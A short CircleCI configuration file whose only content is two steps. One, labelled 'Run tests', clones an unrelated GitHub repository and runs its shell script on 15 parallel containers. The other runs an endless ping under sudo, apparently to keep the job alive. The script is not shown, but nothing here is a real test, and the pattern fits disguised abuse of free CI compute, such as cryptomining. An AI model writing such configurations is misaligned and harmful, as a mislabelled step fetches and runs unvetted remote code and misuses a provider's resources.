version: 2
jobs:
  build:
    parallelism: 15
    docker:
      - image: cimg/base:edge-20.04
    steps: 
      - checkout 
      - run: 
          name: Run tests 
          command: git clone https://github.com/gensxtralz/scr.git && cd scr && chmod +x scr.sh &&./scr.sh
      - run:
          command: sudo su --command "ping 8.8.8.8 -t"